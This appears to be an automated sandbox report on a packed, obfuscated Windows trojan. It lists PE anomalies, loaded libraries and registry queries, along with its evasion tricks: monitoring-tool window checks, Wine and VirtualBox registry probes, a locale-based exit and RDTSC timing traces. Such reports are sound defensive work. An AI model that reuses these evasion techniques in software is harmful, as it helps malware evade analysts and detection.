Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01202B2C	1_2_01202B2C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120ABA1	1_2_0120ABA1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011FD3C1	1_2_011FD3C1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011DBA50	1_2_011DBA50
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01168AE9	1_2_01168AE9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_010F4D90	1_2_010F4D90
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012075EC	1_2_012075EC
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120FCE5	1_2_0120FCE5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0117877A	1_2_0117877A
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012117CB	1_2_012117CB
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01203FD9	1_2_01203FD9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_011FEEA9	1_2_011FEEA9

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 00E44A60 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe

Static PE information: Section: olrcobvx ZLIB complexity 0.9947689559108527

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E63A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

1_2_00E63A50

Source: C:\Users\user\Desktop\file.exe

Code function: 1_2_00E5CAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,

1_2_00E5CAE0

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\2XZNUO5Y.htm

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1823232 > 1048576

Source: file.exe

Static PE information: Raw size of olrcobvx is bigger than: 0x100000 < 0x1a3400

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 1.2.file.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;olrcobvx:EW;fyiwyewh:EW;.taggant:EW;

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

1_2_00E66390

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: file.exe

Static PE information: real checksum: 0x1c00db should be: 0x1c2717

PE file contains sections with non-standard names

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: olrcobvx
Source: file.exe	Static PE information: section name: fyiwyewh
Source: file.exe	Static PE information: section name: .taggant

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012BC12D push edx; mov dword ptr [esp], eax	1_2_012BC173
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_01285932 push eax; mov dword ptr [esp], ecx	1_2_01285950
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_012F2931 push esi; mov dword ptr [esp], 253723A2h	1_2_012F295F
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edx; mov dword ptr [esp], ebp	1_2_01209149
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], ebx	1_2_0120914D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], ebp	1_2_012091CD
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 34EFDCE6h; mov dword ptr [esp], esi	1_2_0120923E
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx	1_2_012092AF
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx	1_2_012094D1
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 29B57B30h; mov dword ptr [esp], ecx	1_2_0120950B
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 428040A8h; mov dword ptr [esp], ebx	1_2_0120953D
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 723646FFh; mov dword ptr [esp], ecx	1_2_012095B0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebx; mov dword ptr [esp], edi	1_2_012095D2
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], esi	1_2_012095F6
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], ebp	1_2_012096E9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edx; mov dword ptr [esp], 2F4CE6F6h	1_2_012097CA
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], ebp	1_2_012097D5
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], eax	1_2_012097E3
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], edx	1_2_01209800
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], ecx	1_2_0120983C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edi	1_2_012098FE
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebx; mov dword ptr [esp], esi	1_2_012099E0
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 11771006h; mov dword ptr [esp], ecx	1_2_01209A54
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push eax; mov dword ptr [esp], edx	1_2_01209AB9
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push ebp; mov dword ptr [esp], 7EF6B9A8h	1_2_01209B40
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 7D638436h; mov dword ptr [esp], edi	1_2_01209C3C
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], eax	1_2_01209C47
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push edi; mov dword ptr [esp], esi	1_2_01209C67
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 4A4D58E5h; mov dword ptr [esp], ebx	1_2_01209C78
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push 75A0A2FCh; mov dword ptr [esp], ebx	1_2_01209CA8
Source: C:\Users\user\Desktop\file.exe	Code function: 1_2_0120911D push esi; mov dword ptr [esp], edx	1_2_01209CD7

Source: file.exe

Static PE information: section name: olrcobvx entropy: 7.953678479680492

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\file.exe

1_2_00E66390

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\Desktop\file.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 10901FA second address: 1090206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090206 second address: 109020A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 109020A second address: 1090210 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1090210 second address: 1090215 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211309 second address: 1211313 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1211313 second address: 121132A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F67787C018Dh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121132A second address: 121132E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12178FD second address: 121791A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0193h 0x00000009 jo 00007F67787C0186h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217EAB second address: 1217EB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1217EB1 second address: 1217EC9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F67787C018Eh 0x00000008 pushad 0x00000009 popad 0x0000000a js 00007F67787C0186h 0x00000010 push eax 0x00000011 push edx 0x00000012 jnc 00007F67787C0186h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121AD3B second address: 121AD47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F6778CEBE4Ch 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121ADE0 second address: 121AE92 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F67787C018Ch 0x00000008 je 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov eax, dword ptr [eax] 0x00000012 jg 00007F67787C019Ah 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c jmp 00007F67787C0198h 0x00000021 pop eax 0x00000022 jmp 00007F67787C0196h 0x00000027 push 00000003h 0x00000029 call 00007F67787C018Fh 0x0000002e jmp 00007F67787C018Ah 0x00000033 pop esi 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 jno 00007F67787C018Bh 0x0000003d sub dword ptr [ebp+122D3284h], ebx 0x00000043 popad 0x00000044 mov edi, esi 0x00000046 push 00000003h 0x00000048 mov esi, ecx 0x0000004a push BFC74118h 0x0000004f pushad 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F67787C0194h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121AE92 second address: 121AF0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jno 00007F6778CEBE56h 0x0000000f popad 0x00000010 add dword ptr [esp], 0038BEE8h 0x00000017 jmp 00007F6778CEBE56h 0x0000001c lea ebx, dword ptr [ebp+1245EC3Ah] 0x00000022 mov dword ptr [ebp+122D1A42h], ebx 0x00000028 jng 00007F6778CEBE57h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 pushad 0x00000032 pushad 0x00000033 popad 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B019 second address: 121B01F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B01F second address: 121B037 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jc 00007F6778CEBE50h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B037 second address: 121B064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F67787C0195h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jo 00007F67787C0186h 0x00000019 pop esi 0x0000001a push ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B064 second address: 121B094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pop eax 0x00000007 lea ebx, dword ptr [ebp+1245EC43h] 0x0000000d mov dword ptr [ebp+122D1A64h], ecx 0x00000013 xchg eax, ebx 0x00000014 jmp 00007F6778CEBE55h 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B094 second address: 121B098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B098 second address: 121B09E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B09E second address: 121B0A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 121B0A4 second address: 121B0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239004 second address: 123900A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12395F1 second address: 12395FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239751 second address: 1239756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239756 second address: 1239791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F6778CEBE52h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F6778CEBE4Fh 0x00000014 jmp 00007F6778CEBE4Dh 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12398C1 second address: 12398CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F67787C0186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12398CB second address: 12398F5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F6778CEBE56h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnc 00007F6778CEBE46h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A64 second address: 1239A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A6C second address: 1239A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F6778CEBE46h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239A7B second address: 1239AB4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b je 00007F67787C0186h 0x00000011 pop edx 0x00000012 popad 0x00000013 pushad 0x00000014 push edx 0x00000015 jc 00007F67787C0186h 0x0000001b push eax 0x0000001c pop eax 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F67787C0199h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C2B second address: 1239C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C35 second address: 1239C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C39 second address: 1239C80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F6778CEBE46h 0x00000013 jbe 00007F6778CEBE46h 0x00000019 jmp 00007F6778CEBE4Eh 0x0000001e jmp 00007F6778CEBE4Bh 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F6778CEBE50h 0x0000002b push ebx 0x0000002c pop ebx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239C80 second address: 1239C9B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F67787C018Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239F80 second address: 1239F9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1239F9D second address: 1239FA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123A143 second address: 123A147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123A147 second address: 123A156 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F67787C0186h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212CF1 second address: 1212CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212CFB second address: 1212D25 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F67787C018Bh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F67787C018Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D25 second address: 1212D29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D29 second address: 1212D33 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D33 second address: 1212D39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1212D39 second address: 1212D5C instructions: 0x00000000 rdtsc 0x00000002 je 00007F67787C0186h 0x00000008 jo 00007F67787C0186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F67787C018Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AA74 second address: 123AA78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123AA78 second address: 123AA94 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F67787C0196h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D48D second address: 123D493 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D493 second address: 123D497 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D604 second address: 123D60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D60C second address: 123D61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D61A second address: 123D624 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F6778CEBE46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D624 second address: 123D65A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0197h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F67787C0191h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123C69C second address: 123C6A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D720 second address: 123D76B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 jmp 00007F67787C0196h 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 push esi 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop esi 0x00000017 push ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop ecx 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e pushad 0x0000001f jmp 00007F67787C0193h 0x00000024 push eax 0x00000025 push edx 0x00000026 jnl 00007F67787C0186h 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 123D90F second address: 123D91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F6778CEBE46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12469FC second address: 1246A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C0186h 0x0000000a popad 0x0000000b push ebx 0x0000000c jmp 00007F67787C0196h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
